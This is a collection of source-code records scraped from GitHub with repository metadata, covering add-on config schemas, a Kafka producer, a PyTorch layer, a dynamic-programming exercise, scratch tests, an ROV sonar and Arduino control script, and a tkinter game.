Please report this to the maintainer of %s\",\n entry,\n new_entry,\n name,\n )\n\n return config\n\n return _migrate\n\n\n# pylint: disable=no-value-for-parameter\n_SCHEMA_ADDON_CONFIG = vol.Schema(\n {\n vol.Required(ATTR_NAME): str,\n vol.Required(ATTR_VERSION): version_tag,\n vol.Required(ATTR_SLUG): vol.Match(RE_SLUG_FIELD),\n vol.Required(ATTR_DESCRIPTON): str,\n vol.Required(ATTR_ARCH): [vol.In(ARCH_ALL)],\n vol.Optional(ATTR_MACHINE): vol.All([vol.Match(RE_MACHINE)], vol.Unique()),\n vol.Optional(ATTR_URL): vol.Url(),\n vol.Optional(ATTR_STARTUP, default=AddonStartup.APPLICATION): vol.Coerce(\n AddonStartup\n ),\n vol.Optional(ATTR_BOOT, default=AddonBoot.AUTO): vol.Coerce(AddonBoot),\n vol.Optional(ATTR_INIT, default=True): vol.Boolean(),\n vol.Optional(ATTR_ADVANCED, default=False): vol.Boolean(),\n vol.Optional(ATTR_STAGE, default=AddonStage.STABLE): vol.Coerce(AddonStage),\n vol.Optional(ATTR_PORTS): docker_ports,\n vol.Optional(ATTR_PORTS_DESCRIPTION): docker_ports_description,\n vol.Optional(ATTR_WATCHDOG): vol.Match(\n r\"^(?:https?|\\[PROTO:\\w+\\]|tcp):\\/\\/\\[HOST\\]:(\\[PORT:\\d+\\]|\\d+).*$\"\n ),\n vol.Optional(ATTR_WEBUI): vol.Match(\n r\"^(?:https?|\\[PROTO:\\w+\\]):\\/\\/\\[HOST\\]:\\[PORT:\\d+\\].*$\"\n ),\n vol.Optional(ATTR_INGRESS, default=False): vol.Boolean(),\n vol.Optional(ATTR_INGRESS_PORT, default=8099): vol.Any(\n network_port, vol.Equal(0)\n ),\n vol.Optional(ATTR_INGRESS_ENTRY): str,\n vol.Optional(ATTR_INGRESS_STREAM, default=False): vol.Boolean(),\n vol.Optional(ATTR_PANEL_ICON, default=\"mdi:puzzle\"): str,\n vol.Optional(ATTR_PANEL_TITLE): str,\n vol.Optional(ATTR_PANEL_ADMIN, default=True): vol.Boolean(),\n vol.Optional(ATTR_HOMEASSISTANT): version_tag,\n vol.Optional(ATTR_HOST_NETWORK, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_PID, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_IPC, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_UTS, default=False): vol.Boolean(),\n vol.Optional(ATTR_HOST_DBUS, default=False): vol.Boolean(),\n vol.Optional(ATTR_DEVICES): [str],\n vol.Optional(ATTR_UDEV, default=False): vol.Boolean(),\n vol.Optional(ATTR_TMPFS, default=False): vol.Boolean(),\n vol.Optional(ATTR_MAP, default=list): [vol.Match(RE_VOLUME)],\n vol.Optional(ATTR_ENVIRONMENT): {vol.Match(r\"\\w*\"): str},\n vol.Optional(ATTR_PRIVILEGED): [vol.Coerce(Capabilities)],\n vol.Optional(ATTR_APPARMOR, default=True): vol.Boolean(),\n vol.Optional(ATTR_FULL_ACCESS, default=False): vol.Boolean(),\n vol.Optional(ATTR_AUDIO, default=False): vol.Boolean(),\n vol.Optional(ATTR_VIDEO, default=False): vol.Boolean(),\n vol.Optional(ATTR_GPIO, default=False): vol.Boolean(),\n vol.Optional(ATTR_USB, default=False): vol.Boolean(),\n vol.Optional(ATTR_UART, default=False): vol.Boolean(),\n vol.Optional(ATTR_DEVICETREE, default=False): vol.Boolean(),\n vol.Optional(ATTR_KERNEL_MODULES, default=False): vol.Boolean(),\n vol.Optional(ATTR_REALTIME, default=False): vol.Boolean(),\n vol.Optional(ATTR_HASSIO_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_HASSIO_ROLE, default=ROLE_DEFAULT): vol.In(ROLE_ALL),\n vol.Optional(ATTR_HOMEASSISTANT_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_STDIN, default=False): vol.Boolean(),\n vol.Optional(ATTR_LEGACY, default=False): vol.Boolean(),\n vol.Optional(ATTR_DOCKER_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_AUTH_API, default=False): vol.Boolean(),\n vol.Optional(ATTR_SERVICES): [vol.Match(RE_SERVICE)],\n vol.Optional(ATTR_DISCOVERY): [str],\n 
vol.Optional(ATTR_BACKUP_EXCLUDE): [str],\n vol.Optional(ATTR_BACKUP_PRE): str,\n vol.Optional(ATTR_BACKUP_POST): str,\n vol.Optional(ATTR_BACKUP, default=AddonBackupMode.HOT): vol.Coerce(\n AddonBackupMode\n ),\n vol.Optional(ATTR_CODENOTARY): vol.Email(),\n vol.Optional(ATTR_OPTIONS, default={}): dict,\n vol.Optional(ATTR_SCHEMA, default={}): vol.Any(\n vol.Schema(\n {\n str: vol.Any(\n SCHEMA_ELEMENT,\n [\n vol.Any(\n SCHEMA_ELEMENT,\n {str: vol.Any(SCHEMA_ELEMENT, [SCHEMA_ELEMENT])},\n )\n ],\n vol.Schema({str: vol.Any(SCHEMA_ELEMENT, [SCHEMA_ELEMENT])}),\n )\n }\n ),\n False,\n ),\n vol.Optional(ATTR_IMAGE): docker_image,\n vol.Optional(ATTR_TIMEOUT, default=10): vol.All(\n vol.Coerce(int), vol.Range(min=10, max=300)\n ),\n vol.Optional(ATTR_JOURNALD, default=False): vol.Boolean(),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\nSCHEMA_ADDON_CONFIG = vol.All(\n _migrate_addon_config(True), _warn_addon_config, _SCHEMA_ADDON_CONFIG\n)\n\n\n# pylint: disable=no-value-for-parameter\nSCHEMA_BUILD_CONFIG = vol.Schema(\n {\n vol.Optional(ATTR_BUILD_FROM, default=dict): vol.Any(\n vol.Match(RE_DOCKER_IMAGE_BUILD),\n vol.Schema({vol.In(ARCH_ALL): vol.Match(RE_DOCKER_IMAGE_BUILD)}),\n ),\n vol.Optional(ATTR_SQUASH, default=False): vol.Boolean(),\n vol.Optional(ATTR_ARGS, default=dict): vol.Schema({str: str}),\n vol.Optional(ATTR_LABELS, default=dict): vol.Schema({str: str}),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\nSCHEMA_TRANSLATION_CONFIGURATION = vol.Schema(\n {\n vol.Required(ATTR_NAME): str,\n vol.Optional(ATTR_DESCRIPTON): vol.Maybe(str),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\n\nSCHEMA_ADDON_TRANSLATIONS = vol.Schema(\n {\n vol.Optional(ATTR_CONFIGURATION): {str: SCHEMA_TRANSLATION_CONFIGURATION},\n vol.Optional(ATTR_NETWORK): {str: str},\n },\n extra=vol.REMOVE_EXTRA,\n)\n\n\n# pylint: disable=no-value-for-parameter\nSCHEMA_ADDON_USER = vol.Schema(\n {\n vol.Required(ATTR_VERSION): version_tag,\n vol.Optional(ATTR_IMAGE): docker_image,\n vol.Optional(ATTR_UUID, default=lambda: uuid.uuid4().hex): uuid_match,\n vol.Optional(ATTR_ACCESS_TOKEN): token,\n vol.Optional(ATTR_INGRESS_TOKEN, default=secrets.token_urlsafe): str,\n vol.Optional(ATTR_OPTIONS, default=dict): dict,\n vol.Optional(ATTR_AUTO_UPDATE, default=False): vol.Boolean(),\n vol.Optional(ATTR_BOOT): vol.Coerce(AddonBoot),\n vol.Optional(ATTR_NETWORK): docker_ports,\n vol.Optional(ATTR_AUDIO_OUTPUT): vol.Maybe(str),\n vol.Optional(ATTR_AUDIO_INPUT): vol.Maybe(str),\n vol.Optional(ATTR_PROTECTED, default=True): vol.Boolean(),\n vol.Optional(ATTR_INGRESS_PANEL, default=False): vol.Boolean(),\n vol.Optional(ATTR_WATCHDOG, default=False): vol.Boolean(),\n },\n extra=vol.REMOVE_EXTRA,\n)\n\nSCHEMA_ADDON_SYSTEM = vol.All(\n _migrate_addon_config(),\n _SCHEMA_ADDON_CONFIG.extend(\n {\n vol.Required(ATTR_LOCATON): str,\n vol.Required(ATTR_REPOSITORY): str,\n vol.Required(ATTR_TRANSLATIONS, default=dict): {\n str: SCHEMA_ADDON_TRANSLATIONS\n },\n }\n ),\n)\n\n\nSCHEMA_ADDONS_FILE = vol.Schema(\n {\n vol.Optional(ATTR_USER, default=dict): {str: SCHEMA_ADDON_USER},\n vol.Optional(ATTR_SYSTEM, default=dict): {str: SCHEMA_ADDON_SYSTEM},\n },\n extra=vol.REMOVE_EXTRA,\n)\n\n\nSCHEMA_ADDON_BACKUP = vol.Schema(\n {\n vol.Required(ATTR_USER): SCHEMA_ADDON_USER,\n vol.Required(ATTR_SYSTEM): SCHEMA_ADDON_SYSTEM,\n vol.Required(ATTR_STATE): vol.Coerce(AddonState),\n vol.Required(ATTR_VERSION): version_tag,\n },\n 
extra=vol.REMOVE_EXTRA,\n)\n","repo_name":"home-assistant/supervisor","sub_path":"supervisor/addons/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":14965,"program_lang":"python","lang":"en","doc_type":"code","stars":1510,"dataset":"github-code","pt":"3"}
+{"seq_id":"17746737736","text":"from .kafka.config import KafkaProducerConfig\nfrom .kafka.producer import KafkaProducer\n\nfrom .event import Event\nfrom .schema_registry import SchemaRegistry\n\n\nclass DataStreamingProducer:\n    def __init__(\n        self,\n        topic: str,\n        kafka_config: KafkaProducerConfig,\n        schema_registry: SchemaRegistry,\n    ):\n        self.topic = topic\n        self.name = kafka_config.client_id\n        self.producer = KafkaProducer(kafka_config)\n        self.schema_registry = schema_registry\n\n    def validate_event(self, event: Event):\n        self.schema_registry.validate(\n            event.dict(),\n            event.event_name.value,\n            event.event_version,\n        )\n        return\n\n    def produce_event(self, event: Event):\n        self.producer.produce(self.topic, event.json())\n        return\n\n    def start(self):\n        self.producer.start()\n\n    def stop(self):\n        self.producer.stop()\n","repo_name":"vdnsnkv/awesome-tes","sub_path":"py_lib/data_streaming_producer.py","file_name":"data_streaming_producer.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43636085818","text":"import torch as t\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass AxialConv(nn.Module):\n    def __init__(\n        self,\n        in_channels,\n        out_channels,\n        stride=1,\n        padding=0,\n        dilation=1,\n        groups=1,\n        bias=True,\n    ):\n        super().__init__()\n        self.conv1 = nn.Conv2d(\n            in_channels,\n            in_channels,\n            (4, 1),\n            stride,\n            \"same\",\n            dilation,\n            groups,\n            bias,\n        )\n        self.conv2 = nn.Conv2d(\n            in_channels,\n            out_channels,\n            (5, 1),\n            stride,\n            \"same\",\n            dilation,\n            groups,\n            bias,\n        )\n\n    def forward(self, x):\n        x_1 = self.conv1(x)\n        # Tensor.transpose swaps exactly two dims, so transpose(0, 1, 3, 2) raises a\n        # TypeError; permute is the call that reorders (N, C, H, W) -> (N, C, W, H).\n        x_2 = self.conv2(x.permute(0, 1, 3, 2)).permute(0, 1, 3, 2)\n        return F.relu(x_1 + x_2)\n\n    def get_attention_scores(self):\n        res = self.conv1.weight.detach().cpu().abs().mean(dim=1, keepdim=True), self.conv2.weight.detach().cpu().abs().mean(dim=1, keepdim=True)\n        return res\n","repo_name":"SalamanderXing/weather-prediction","sub_path":"main/torch_model_modules/axial_conv.py","file_name":"axial_conv.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5648804196","text":"# -*- coding:utf-8 -*-\n\"\"\"\nGiven a number, translate it into a string by the following rule: 0 translates to \"a\", 1 to \"b\", ..., 25 to \"z\".\nA number can have several possible translations; for example 12258 has 5 in total: bccfi, bwfi, bczi, mcfi, mzi.\nImplement a function that computes how many different translations a number has.\nThis is a dynamic-programming problem:\n 12258\n / \\\n b+2258 m+258\n / \\ / \\\n bc+258 bw+58 mc+58 mz+8\n / \\ \\ \\ \\\n bcc+58 bcz+8 bwf+8 mcf+8 mzi\n / \\ \\ \\\n bccf+8 bczi bwfi mcfi\n /\n bccfi\nBottom-up (equivalently, right to left) dynamic programming, starting from the smallest subproblem:\nf(r) denotes the number of ways to translate the digits from position r (r starts at 0) through the right end.\nFor a number of length n, f(n) = 1 and f(n-1) = 1 (the empty suffix has exactly one translation, matching the\n[1, 1] base case in get_trans_count_2 below); we want f(0).\nThe recurrence (transition) is f(r-2) = f(r-1) + g(r-2, r-1) * f(r),\nwhere g(r-2, r-1) = 1 if the digits at positions r-2 and r-1 translate to a single character (i.e. form 10..25), otherwise 0.\nTherefore, for 12258:\nf(5) = 1\nf(4) = 1\nf(3) = f(4) + 0 = 1\nf(2) = f(3) + f(4) = 2\nf(1) = f(2) + f(3) = 3\nf(0) = f(1) + f(2) = 5\nAuthor: ryderchan\nLink: https://www.jianshu.com/p/80e1841909b7\n\"\"\"\n\n\nclass Solution:\n    def trans_num_str(self, numbers):\n        if numbers < 0:\n            return 0\n        str_num = str(numbers)\n        print(\"old\", self.get_trans_count(str_num))\n        print(\"new\", self.get_trans_count_2(str_num))\n        return self.get_trans_count(str_num)\n\n    def get_trans_count(self, str_num):\n        length = len(str_num)\n        counts = [0] * length\n        for i in range(length - 1, -1, -1):\n            if i < length - 1:\n                count = counts[i + 1]\n            else:\n                count = 1\n\n            if i < length - 1:\n                digit1 = int(str_num[i])\n                digit2 = int(str_num[i + 1])\n                covered = digit1 * 10 + digit2\n                if 10 <= covered <= 25:\n                    if i < length - 2:\n                        count += counts[i + 2]\n                    else:\n                        count += 1\n            # print(count, i)\n            counts[i] = count\n        # print(counts)\n        return counts[0]\n\n    def get_trans_count_2(self, str_num):\n        length = len(str_num)\n        res = [0]*(length-1) + [1, 1]\n        for i in range(length - 2, -1, -1):\n            # if \"{}{}\".format(str_num[i], str_num[i+1]) < \"26\":\n            # only \"10\"..\"25\" is a translatable pair; a leading zero (e.g. \"05\") is not\n            if \"10\" <= str_num[i:i + 2] < \"26\":\n                g = 1\n            else:\n                g = 0\n            res[i] = res[i+1] + res[i+2]*g\n        return res[0]\n\n    def get_trans_count_3(self, num):\n        \"\"\"Front-to-back DP, analogous to climbing stairs\"\"\"\n        size = len(num)\n        if size <= 1:\n            return 1\n        dp = [0] * size\n        dp[0] = 1\n        dp[1] = 2 if 10 <= int(num[:2]) < 26 else 1\n        for i in range(2, size):\n            dp[i] = dp[i-1] + dp[i-2] if 10 <= int(num[i-1:i+1]) < 26 else dp[i-1]\n        return dp[-1]\n\n\nif __name__ == '__main__':\n    s = Solution()\n    s.trans_num_str(12258)\n    print(s.get_trans_count_3(\"12818\"))\n","repo_name":"a625687551/Leetcode","sub_path":"TargetOffer/46、把数字翻译成字符串.py","file_name":"46、把数字翻译成字符串.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36039323985","text":"import Implementations.GraphBuilder.simple_graph_builder as gb\nfrom Framework.Matchers.simple_matcher import SimpleMatcher\nfrom Implementations.Graphs.networkx_graph import NetworkxGraph\n\nrev1 = [\n    \"a\",\n    \"b.1\",\n    \"b.2\",\n    \"c\",\n    \"b.3\"\n]\n\nrev2 = [\n    \"a\",\n    \"b.1\",\n    \"b.2\",\n    \"b.3\",\n    \"c\"\n]\n\nrev3 = [\n    \"a.1\",\n    \"b.1\",\n    \"b.2\",\n    \"b.3\",\n    \"d\",\n    \"e.1\",\n    \"e.2\"\n]\n\nrev4 = [\n    \"b.1\",\n    \"b.2\",\n    \"d\",\n    \"e.2\"\n]\n\n\n# def main():\n#     # revisions = [rev1, rev2, rev3, rev4]\n#     revisions = [rev1, rev2]\n#     gb_obj = gb.GraphBuilder()\n#     beginning = gb_obj.build_graph(revisions)\n#\n# main()\n\ndef test_check_displacement():\n    rev1 = [\n        \"a\",\n        \"b.1\",\n        \"b.2\",\n        \"c\",\n        \"b.3\"\n    ]\n\n    rev2 = [\n        \"a\",\n        \"b.1\",\n        \"b.2\",\n        \"b.3\",\n        \"c\"\n    ]\n\n    revisions = [rev1, rev2]\n    networkx_graph = NetworkxGraph()\n    simple_matcher = SimpleMatcher()\n    gb_obj = 
gb.SimpleGraphBuilder(simple_matcher)\n beginning = gb_obj.build_graph(revisions)\n\n assert beginning[0][2].label == \"a\"\n assert beginning[1][2].label == \"a\"\n assert beginning[1][3].label == \"u\"\n assert beginning[1][3].content == rev1[2]\n assert beginning[1][4].label == \"u\"\n assert beginning[1][5].label == \"u\"\n\n\ndef test_blanks():\n rev1 = [\n \"e\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n \"fd\"\n ]\n\n rev2 = [\n \"e\",\n \"\",\n \"\",\n \"yz\"\n ]\n beginning = None\n revisions = [rev1, rev2]\n networkx_graph = NetworkxGraph()\n simple_matcher = SimpleMatcher()\n gb_obj = gb.GraphBuilder(simple_matcher, networkx_graph)\n beginning = gb_obj.build_graph(revisions)\n\n assert beginning[0][1].label == \"a\"\n assert beginning[0][2].label == \"a\"\n assert beginning[0][3].label == \"d\"\n assert beginning[0][4].label == \"d\"\n assert beginning[0][5].label == \"d\"\n assert beginning[0][6].label == \"d\"\n assert beginning[1][1].label == \"u\"\n assert beginning[1][2].label == \"u\"\n assert beginning[1][3].label == \"a\"\n\n\ndef ReadTextFromFile(file_name):\n f = open(file_name, \"r\")\n return f.read().split('\\n')\n\n\ndef test_with_actual_files():\n rev1 = ReadTextFromFile(\"Data/Rev1\")\n rev2 = ReadTextFromFile(\"Data/Rev2\")\n revisions = [rev1, rev2]\n networkx_graph = NetworkxGraph()\n simple_matcher = SimpleMatcher()\n gb_obj = gb.GraphBuilder(simple_matcher, networkx_graph)\n beginning = gb_obj.build_graph(revisions)\n gb_obj.slice_line(1, 1)\n print(beginning[1][1].content)\n\n\ntest_with_actual_files()\n# test_check_displacement()\n# test_mutation_of_lines()\n# test_right_addition()\n# test_blanks()\n\n\n\n\n\n\n\n","repo_name":"saurabhc123/cs5704","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20177599107","text":"\n#!/usr/bin/env python3\nimport serial\nimport time\nimport numpy as np\n# import matplotlib.pyplot as plt\n# import cv2\n\n# Custom libraries imports\nfrom sonarFunctionality.BlueRoboticsSonar import Ping360\nfrom sonarFunctionality.Interlocking import InterlockingSystem\n# import communication.GUI_communication\n# from communication.GUI_communication import communicationWithGUI\nimport config\n\n\nimport json # Serialization of data for Arduino communication\nimport threading\n\n\n\n\nif __name__ == \"__main__\":\n import argparse\n import cv2\n import numpy as np\n from math import *\n\n # Taking in connection details when running script in terminal\n parser = argparse.ArgumentParser(description=\"Ping python library example.\")\n parser.add_argument('--device', action=\"store\", required=True, type=str, help=\"Ping device port.\")\n parser.add_argument('--baudrate', action=\"store\", type=int, default=2000000, help=\"Ping device baudrate.\")\n args = parser.parse_args()\n\n # Establishes connection to Ping 360 sonar\n p = Ping360()\n p.connect_serial(args.device, args.baudrate) # Added this to get working\n\n # Initialization parameters\n print(\"Initialized: %s\" % p.initialize())\n p.set_transmit_frequency(1000) # Original: 1000\n p.set_sample_period(50) # Original: 80 Sets sample period in ticks\n p.set_number_of_samples(1200) # Original: 500 Determines the resolution (higher num -> finer details)\n p.set_range(50) # Range on start up\n\n # Initalize interlocking system for motor driving zones\n ils = InterlockingSystem()\n\n # Variables\n max_range = 80*200*1450/2\n length = 640\n image 
= np.zeros((length, length, 1), np.uint8)\n angle = 0\n objectData = []\n operatorForceReset = False\n\n # Global variables used in communication\n #x = 10\n #y = 20\n\n # TCP communication variables\n HOST = \"169.254.226.72\" # The IP address of the RASPBERRY Pi assigns to this communication\n PORT = 1422 # Port to listen on (non-privileged ports are > 1023)\n\n\n import socket\n import pickle # Serialization of data for GUI communication\n import cv2\n import numpy as np\n\n\n def communicationWithGUI(HOST, PORT):\n\n HEADERSIZE = 10\n address = \"\"\n\n # Establishes a reliable and in-order data delivery TCP connection\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((HOST, PORT)) # Binds port to requested IP and Port\n s.listen(2) # Specifies number of unaccepted connection before refusing new\n\n print(\"OPENING CAMERA PORT\")\n cam = cv2.VideoCapture(2) # Initializes connection to camera\n\n\n while True:\n receiving = True # When beginning while loop we want to receive a message from GUI\n\n if not address: # If no address is given, try to find one\n clientsocket, address = s.accept()\n print(f\"Connection from {address} has been established.\")\n\n ret_val, img = cam.read() # Takes a photo with camera\n compressed = commpressImage(img, 10) # Compressing image\n\n # Finalizing dicitionary with all values to be sent to GUI\n d = {\n \"key1\": compressed,\n \"key2\": 232,\n \"key3\": [True, False, True],\n \"key4\": 23\n }\n\n # Serializing the dicitionary and sending\n msg = pickle.dumps(d)\n msg = bytes(f\"{len(msg):<{HEADERSIZE}}\", 'utf-8') + msg\n clientsocket.send(msg)\n\n\n # Receiving answer from computer\n while receiving:\n full_msg = b''\n new_msg = True\n while receiving:\n incoming_message = clientsocket.recv(20000)\n # print(incoming_message)\n if new_msg: # Changed rom if new_msg\n msglen = int(incoming_message[:HEADERSIZE])\n new_msg = False\n\n full_msg += incoming_message\n\n if len(full_msg)-HEADERSIZE == msglen:\n response = pickle.loads(full_msg[HEADERSIZE:]) # Deserialize reponse from GUI\n global x\n global y\n # Setting the global variables accordingly\n x = response[\"key1\"]\n print(f'X value inside thread {x}')\n\n # Resetting variables for next iteration\n receiving = False\n new_msg = True\n full_msg = b''\n\n\n def commpressImage(img, k):\n width = int((img.shape[1])/k)\n height = int((img.shape[0])/k)\n return cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA)\n\n\n\n\n def changeOperatingMode(mode):\n # Checks if input is different from last iteration\n if mode == 0:\n p.set_range(2) # Short range collision avoidance mode\n p.set_step(8)\n p.set_gain_setting(0)\n elif mode == 1:\n p.set_range(4) # Medium range collision avoidance mode\n p.set_step(4)\n p.set_gain_setting(0)\n elif mode == 2:\n p.set_range(50) # Aquaculture inspection mode\n p.set_step(2)\n p.set_gain_setting(1)\n else:\n print(\"Did not recognize mode command\")\n print(\"Corrupt or invalid data given\")\n return\n\n # Start a thread that handles communication with GUI\n t1 = threading.Thread(target=communicationWithGUI, args=[HOST, PORT])\n t1.start()\n\n # Initialize serial communication with Arduino UNO\n ardSer = serial.Serial('/dev/ttyACM1', 9600, timeout=1,\n parity=serial.PARITY_NONE, bytesize=serial.EIGHTBITS, stopbits=serial.STOPBITS_ONE)\n\n print(\"CONNECTION WITH ARDUINO ESTABLISED\")\n\n\n while(True):\n theta_ = []\n r_ = []\n color_ = []\n p.transmitAngle(angle)\n data = bytearray(getattr(p,'_data'))\n data_lst = []\n\n # print(f\"{len(data)} 
number of values in data\")\n\n for k in data :\n data_lst.append(k)\n\n # Drastic speed up when disabling the plotting of scanned map, have to handle this on surface\n \"\"\"\n center = (length/2,length/2)\n linear_factor = len(data_lst)/center[0]\n for i in range(int(center[0])):\n if(i < center[0]*max_range/max_range):\n try:\n pointColor = data_lst[int(i*linear_factor-1)]\n except IndexError:\n pointColor = 0\n\n else:\n pointColor = 0\n for k in np.linspace(0,p.get_step(),8*p.get_step()):\n image[int(center[0]+i*cos(2*pi*(angle+k)/400)), int(center[1]+i*sin(2*pi*(angle+k)/400)), 0] = pointColor\n\n color = cv2.applyColorMap(image,cv2.COLORMAP_JET)\n cv2.imshow('Sonar Image',image)\n cv2.waitKey(25)\n \"\"\"\n\n # SERIAL WITH ARDUINO\n ArdDataOut = {}\n print(f'X value outside thread {config.x}')\n ArdDataOut[\"light\"] = 1 # SET BY GUI: 0-255 light settings\n ArdDataOut[\"runZone\"] = 1 # SET BY GUI: 1-8 Linear directions, 9 and 10 clock and counter-clock respectively\n ArdDataOut[\"locked\"] = ils.lockedZones\n ArdDataOut = json.dumps(ArdDataOut)\n\n # If program takes longer to run, there might be problem with serial\n # Band-aid solution could be to add delay in Arduino C++ script\n print(\"One loop in Python\")\n if ardSer.in_waiting > 0:\n input_str = ardSer.readline().decode(\"utf-8\").rstrip()\n print(input_str)\n print(ArdDataOut)\n ardSer.write(ArdDataOut.encode())\n\n\n\n\n changeOperatingMode(0) # SET BY GUI\n operatorForceReset = False # SET BY GUI\n # print(f\"The sonar is scanning from 0 to {round(p.get_range(), 2)} meters\")\n # print(f\"Set range is {p.get_range()}, set step is {p.get_step()}\")\n\n\n if operatorForceReset:\n ils.resetAllZones()\n\n # If object is found, interlock current zone\n if ils.findObject(data_lst):\n ils.setInterlockZone(ils.findZone(angle), angle)\n\n # Incrementing next scan, to not automatically reset the set zone above with the under statement\n angle = (angle + p.get_step()) % 400\n # print(f\"Scanning angle {angle}\")\n\n # If the current angle is equal to any of the angles that were used to lock a zone\n if ils.checkIfResetPermitted(angle):\n # Reset that zone as the sonar has scanned that zone again, and no object is detect\n ils.resetInterlockZone(ils.findZone(angle))\n\n\n # print(f\"All currently locked zones: {ils.lockedZones}\")\n # print(f\"All zones locked angles: {ils.zoneLockedAngles}\")\n print(\"\")","repo_name":"EliasWR/RovRaspberry","sub_path":"DirectlyFromArduino/MainWorking.py","file_name":"MainWorking.py","file_ext":"py","file_size_in_byte":8895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38552599225","text":"from tkinter import * ## notice lowercase 't' in tkinter here for python 3\nimport time\nimport random\nimport sys\nt = time.time()\n\nc=0;\nlim=10; #limit of how may dummy buttons there can be for c==6\ng=[0]*lim;# pre allocate g\nx=1 # starting value of x to create one dummy button\ndef rngp(): #Generates button positions on the widget \n win_w=root.winfo_width()\n win_h= root.winfo_height()\n w=button.winfo_width() \n h=button.winfo_height()\n w1=button1.winfo_width() \n h1=button1.winfo_height() \n rngp.n_x=random.uniform(0, win_w-w1-w)\n rngp.n_y=random.uniform(h, win_h-h1)\n \n \n \ndef callback():\n global c\n rngp() \n button1.place(y=rngp.n_y, x=rngp.n_x)\n \n if c == 0:\n button1.configure(text=\"Once More?\") \n elif 0< c < 5:\n button1.configure(text=\"Once again?\") \n elif c==5: # needs to be fixed\n button1.configure(text=\"Catch 
Me!!\") \n i=1\n while i<11: \n rngp()\n button1.place(y=rngp.n_y, x=rngp.n_x)\n print (i)\n #time.sleep(1), #Disabled until this level is fixed\n i+=1\n \n #trying to make the button change position while you try to click it, however\n #the button only shows its last position in the loop\n \n elif c==6: #needs to be tweaked\n button1.configure(text=\"is this the button?\")\n global x\n \n \n for i in range(0,x):\n makeframe()\n g[i]=makeframe.app\n button2=Button(g[i], text= \"is this the button!\",command=dup) \n button2.grid()\n #! instead of ? to distinguish the dummy buttons, change when completed\n\n #NEED TO MAKE SURE FRAMES DO NOT OVERLAP SO BUTTONS CAN BE CLEARLY PRESSED!!\n \n \n \n else: \n for i in range(0,x):\n g[i].destroy()\n \n button1.configure(text=\"Done for now\")\n button1['state'] = 'disabled'\n\n c=counter(c) \n \ndef des():\n root.destroy()\n sys.exit()\n \n \n #print(c)\n\ndef makeframe():\n #x=1;\n rngp()\n w1=button1.winfo_width() \n h1=button1.winfo_height()\n makeframe.app=Frame(root, height=h1, width=w1)\n makeframe.app.place(y=rngp.n_y, x=rngp.n_x)\n\n\ndef dup(): \n global x \n \n for i in range(0,x):\n g[i].destroy()\n\n x+=1\n\n if x>lim: #x=10 is the limit for now, once x>10, program closes\n button1.configure(text=\"You Lose!\")\n button1['state'] = 'disabled'\n\n else:\n print(x) #remove when level c==6 is completed\n rngp()\n button1.place(y=rngp.n_y, x=rngp.n_x)\n for i in range(0,x):\n makeframe()\n g[i]=makeframe.app\n button2=Button(g[i], text= \"is this the button!\",command=dup)\n button2.grid()\n\n \nroot=Tk()\nroot.title(\"My GUI\")\nroot.geometry(\"400x200\")\n\nbutton1=Button(root, text= \"Hello, Click me!\",command=callback)\nbutton1.place(y=100, x=200)\n\nbutton=Button(root, text=\"End\",command=des)\nbutton.place(rely=0, relx=1.0, x=0, y=0, anchor=NE)\n\ndef counter(c):\n c+=1\n return c\n\n\n\nelapsed= time.time()-t\n\n\n\n\n","repo_name":"PAchilleos/Python-Stuff","sub_path":"Question Mark/QM.py","file_name":"QM.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31643627271","text":"import json\nimport requests\n\n\ndef transliterate(text, reverse=False):\n symbols = (u\"абвгдежзийклмнопрстуфхцчшщъыьюяАБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\",\n u\"abvgdejzijklmnoprstufhzcss_y_uaABVGDEEJZIJKLMNOPRSTUFHZCSS_Y_EUA\")\n\n if reverse==True:\n tr = {ord(b):ord(a) for a, b in zip(*symbols)}\n else:\n tr = {ord(a):ord(b) for a, b in zip(*symbols)}\n return text.translate(tr)\n\ndef call_fast_api(data, endpoint, port=4990, action='GET', host = '127.0.0.1'):\n if not isinstance(data, str):\n data=json.dumps(data)\n \n api_url = f'http://{host}:{port}/{endpoint}'\n\n if action=='GET':\n response = requests.get(api_url, data=data)\n elif action=='POST':\n response = requests.post(api_url, data=data)\n \n if response.status_code == 200:\n return json.loads(response.content.decode('utf-8'))\n else:\n return response","repo_name":"md-experiments/translator_ui","sub_path":"translator_ui/source/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29817388955","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# tasks.py\nfrom xalive.app import app\nfrom .config import WA_PATH, PY_PATH, RS_PATH\nimport requests\nimport os\nimport time\nimport simplejson\nimport subprocess\nimport 
